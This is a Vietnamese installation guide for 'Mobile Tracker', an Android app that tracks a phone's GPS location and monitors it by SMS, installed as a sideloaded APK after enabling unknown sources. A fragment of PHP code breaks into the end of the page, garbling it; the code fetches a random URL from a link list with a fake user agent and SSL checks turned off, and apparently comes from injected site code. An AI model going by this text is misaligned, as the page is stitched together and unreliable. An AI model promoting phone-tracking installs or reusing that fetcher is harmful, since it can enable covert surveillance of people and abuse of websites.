Cài đặt Mobile Tracker

1)      Điều Kiện Cài Đặt.

-       Hiện nay, phần mềm Mobile Tracker chỉ hỗ trợ cho dòng điện thoại chạy hệ điều hành Android (HTC, SAMSUNG, MOTOROLA, LG, HK PHONE). Các dòng điện thoại thuộc hệ điều hành iOS của Apple (iPhone, iPad,..) và Windows Phone (Nokia,…) chưa được hổ trợ.

-       Điện thoại có khả năng kết nối Internet bằng Wifi/GPRS/3G/4G.

-       Điện thoại phải có chip GPS (Global Positioning System).

 

2)      Hướng Dẫn Cài Đặt Phần Mềm Mobile Tracker

Bước 1: Tải Phần Mềm Mobile Tracker

1.1 Mở trình duyệt trên điện thoại. 

Hướng dẫn cài đặt bước 1

 

1.2 Nhập địa chỉ www.giamsatdienthoai.com/mtrack.apk vào trình duyệt để tải phần mềm về điện thoại (Cách 1).

Hướng dẫn cài đặt bước 2

 

     * Lưu ý: Kéo thanh notification bar phía trên màn hình điện thoại xuống để nhìn thầy file đang được download

Hướng dẫn cài đặt bước 3

(Cách 2: Hoặc có thể sử dụng ứng dụng quét QR Code trên điện thoại di động để quét vào hình QR code dưới đây để lấy đường link tải phần mềm).

Hướng dẫn cài đặt bước 4

Bước 2: Cài Đặt Phần Mềm Mobile Tracker

2.1 Nhấn vào file mtrack.apk vừa được download về.

Hướng dẫn cài đặt bước 5

 

2.2 Sau khi nhấn vào file mtrack.apk, hộp thoại sẽ hiện ra như bên dưới, nhấn vào nút Install (Cài đặt) để cài đặt phần mềm Mobile Trakcer vào điện thoại.

     * Lưu ý: Để có thể cài đặt, bạn phải bật cấu hình như sau: vào Menu -> Settings -> Applications -> Đánh dấu vào Unknow    sources. Hoặc nếu máy giao diện tiếng Việt: vào Menu -> Cài đặt -> Ứng dụng -> đánh dấu vào Không rõ nguồn gốc.

Hướng dẫn cài đặt bước 6

 

1.5 Hộp thoại thông báo đã cài đặt xong hiện ra, nhấn vào nút Open (Chạy) để chạy ứng dụng Mobile Tracker.

Hướng dẫn cài đặt bước 7

 

Bước 3: Đăng Ký Tài Khoản

3.1 Đăng ký tài khoản.

                – Nhập địa chỉ Email thật và Họ tên vào các ô tương ứng.
                – Nhập số điện thoại của người giám sát nếu muốn sử dụng tính năng Giám sát bằng tin nhắn (Xem chi tiết)
                – Nhấn nút Đăng ký để tiến hành đăng ký tài khoản.
                – Khởi động lại điện thoại để ứng dụng bắt đầu hoạt động. 

Hướng dẫn cài đặt bước 8-9

     * Lưu ý: Email của bạn được sử dụng trong những trường hợp sau đây:

            + Đăng nhập vào hệ thống Mobile Tracker.

            + Gửi email xác nhận thông tin đăng ký.

            + Phục hồi mật khẩu khi bị quên.

            + Nhận thông báo cập nhật phiên bản mới của phần mềm (bao gồm sửa lỗi và nâng cấp phần mềm)

 

3.2 Mở chương trình đọc Email để xác nhận thông tin và kích hoạt tài khoản đã đăng ký.

Hướng dẫn cài đặt bước 10

     * Lưu ý:

           + Trong trường hợp không thấy email kích hoạt, vui lòng kiểm tra trong hộp thư rác/spam.

           + Sau khi hoàn tất mục 3.1 thì hệ thống sẽ gửi đến bạn 01 mail để xác nhận thông tin tài khoản.

 

 Bước 4: Kiểm Tra Kết Quả Đăng Ký Tài Khoản

4.1 Mở trình duyệt Internet trên máy tính.

4.2 Truy cập pc.giamsatdienthoai.com và đăng nhập vào hệ thống.

Hướng dẫn cài đặt bước 11

 

4.3 Kiểm tra vị trí điện thoại trên bản đồ.

Hướng dẫn cài đặt bước 12

     * Lưu ý: để chương trình hoạt động tốt, phải đảm bảo điện thoại có kết nối Internet bằng Wifi/3G/GPRS.

 

— Chúc mừng bạn đã hoàn tất việc đăng ký tài khoản —

 

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>
Phân Phối Độc Quyền Bởi Magiwan  Like us on Facebook